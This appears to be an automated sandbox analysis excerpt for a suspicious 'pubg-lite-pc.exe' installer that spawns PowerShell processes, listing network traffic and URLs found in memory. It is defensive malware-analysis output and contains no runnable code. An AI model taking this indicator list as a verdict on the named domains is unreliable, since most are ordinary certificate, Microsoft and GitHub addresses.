Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 10 Aug 2022 04:46:43 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-Withpermissions-policy: interest-cohort=()Cache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-originExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 10 Aug 2022 04:47:09 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-Withpermissions-policy: interest-cohort=()Cache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-originExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 10 Aug 2022 04:47:36 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-Withpermissions-policy: interest-cohort=()Cache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-originExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 10 Aug 2022 04:47:59 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-Withpermissions-policy: interest-cohort=()Cache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-originExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 10 Aug 2022 04:47:09 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-Withpermissions-policy: interest-cohort=()Cache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-originExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 10 Aug 2022 04:47:59 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-Withpermissions-policy: interest-cohort=()Cache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-originExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 10 Aug 2022 04:47:36 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-Withpermissions-policy: interest-cohort=()Cache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-originExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Wed, 10 Aug 2022 04:48:03 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-Withpermissions-policy: interest-cohort=()Cache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-originExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: pubg-lite-pc.exe, 00000001.00000000.64931774401.0000000000A9E000.00000002.00000001.01000000.00000003.sdmp, pubg-lite-pc.exe, 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: Shell32.dllShlwapi.dllbinSoftware\JavaSoft\Java Runtime Environment\Software\JavaSoft\Java Development Kit\JavaHomeFlashWindowExFlashWindowGetPackagePathKernel32.dllhttp://www.google.comhttp://www.example.comhttp://www.yahoo.comtin9999.tmpTESTHEAD.part=attachmentfilename "DLDcharsetPOST123utf-16utf-8US-ASCIIISO-8859-1GETAdvancedInstallerFTP ServerLocal Network ServerHTTP/1.0*/*If-Modified-Since: %s equals www.yahoo.com (Yahoo)
Source: pubg-lite-pc.exe, 00000001.00000002.66223153989.0000000005FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digice
Source: pubg-lite-pc.exe, 00000001.00000002.66223153989.0000000005FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66224427029.0000000006770000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66204704157.0000000001514000.00000004.00000020.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66216182771.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66224427029.0000000006770000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66204704157.0000000001514000.00000004.00000020.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66216182771.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: pubg-lite-pc.exe, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://collect.installeranalytics.com
Source: powershell.exe, 00000007.00000002.65296318896.0000020D99A66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.4
Source: pubg-lite-pc.exe, 00000001.00000002.66204704157.0000000001514000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000003.65205693106.0000020D996DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65586372147.000002465E703000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65818234743.000002B419B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: pubg-lite-pc.exe, 00000001.00000002.66204704157.0000000001514000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000003.65205693106.0000020D996DE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.65293377278.0000020D996FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65585094097.000002465E6B7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000003.65655622427.000002B47F9FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000007.00000002.65296318896.0000020D99A66000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.65913647336.0000024B7ABE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
Source: powershell.exe, 00000011.00000003.65401609385.000002465E86A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
Source: powershell.exe, 00000011.00000002.65590219105.000002465E9B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c
Source: pubg-lite-pc.exe, 00000001.00000002.66223153989.0000000005FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAs
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66224427029.0000000006770000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66204704157.0000000001514000.00000004.00000020.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66216182771.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66224427029.0000000006770000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66204704157.0000000001514000.00000004.00000020.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66216182771.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: pubg-lite-pc.exe, 00000001.00000002.66223153989.0000000005FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.co
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66224427029.0000000006770000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66204704157.0000000001514000.00000004.00000020.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66216182771.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66224427029.0000000006770000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66223153989.0000000005FA2000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66204704157.0000000001514000.00000004.00000020.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66216182771.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: pubg-lite-pc.exe, 00000001.00000002.66201317922.00000000014BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: pubg-lite-pc.exe, 00000001.00000002.66201317922.00000000014BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000016.00000002.65762187363.000002B402E44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.66019158390.0000024B63550000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
Source: powershell.exe, 00000007.00000003.65114455500.0000020D82AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.65277626545.0000020D915C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65565812606.0000024656719000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65805223151.000002B411BBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65798855963.000002B411A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66224427029.0000000006770000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66204704157.0000000001514000.00000004.00000020.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66216182771.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66224427029.0000000006770000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66223153989.0000000005FA2000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66204704157.0000000001514000.00000004.00000020.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66216182771.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
Source: powershell.exe, 00000007.00000002.65215310594.0000020D8173D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65467834048.000002464688E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65673219962.000002B401C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.65948499140.0000024B6296C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000016.00000002.65673219962.000002B401C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.65948499140.0000024B6296C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000007.00000002.65215310594.0000020D8173D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65467834048.000002464688E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzq
Source: powershell.exe, 00000007.00000002.65215310594.0000020D8173D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65467834048.000002464688E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000007.00000002.65210670104.0000020D81561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65461290089.00000246466B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65663197254.000002B401A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.65215310594.0000020D8173D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65467834048.000002464688E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: pubg-lite-pc.exe, 00000001.00000002.66223153989.0000000005FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://t1.sym7vk
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66223153989.0000000005FA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://t2.symcb.com0
Source: pubg-lite-pc.exe, 00000001.00000002.66221989496.0000000005F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tl.s
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tl.symcb.com/tl.crl0
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tl.symcb.com/tl.crt0
Source: pubg-lite-pc.exe, 00000001.00000002.66213647590.00000000046AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tl.symcb.y
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tl.symcd.com0&
Source: powershell.exe, 00000007.00000002.65215310594.0000020D8173D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65467834048.000002464688E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65673219962.000002B401C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.65948499140.0000024B6296C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000016.00000002.65673219962.000002B401C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.65948499140.0000024B6296C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000007.00000002.65215310594.0000020D8173D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65467834048.000002464688E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzq
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66224427029.0000000006770000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66223153989.0000000005FA2000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66204704157.0000000001514000.00000004.00000020.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66216182771.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000011.00000002.65585094097.000002465E6B7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65590219105.000002465E9B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
Source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
Source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll1.2.7rbr
Source: powershell.exe, 00000007.00000002.65210670104.0000020D81561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65461290089.00000246466B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65663197254.000002B401A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/_private/browser/errors
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/_private/browser/optimizely_client/errors
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/_private/browser/stats
Source: powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avatars.githubusercontent.com
Source: pubg-lite-pc.exe, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://collect.installeranalytics.com
Source: pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.github.com/github/collect
Source: powershell.exe, 00000016.00000002.65798855963.000002B411A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.65798855963.000002B411A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000002.65798855963.000002B411A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://education.github.com
Source: pubg-lite-pc.exe, 00000001.00000002.66224427029.0000000006770000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://freesharesoft.com
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github-cloud.s3.amazonaws.com
Source: powershell.exe, 00000016.00000002.65721729674.000002B40263C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/
Source: powershell.exe, 00000007.00000002.65215310594.0000020D8173D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65467834048.000002464688E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65673219962.000002B401C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.65948499140.0000024B6296C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000002.65673219962.000002B401C3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.65948499140.0000024B6296C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000007.00000002.65215310594.0000020D8173D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65467834048.000002464688E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzq
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/enterprise/contact
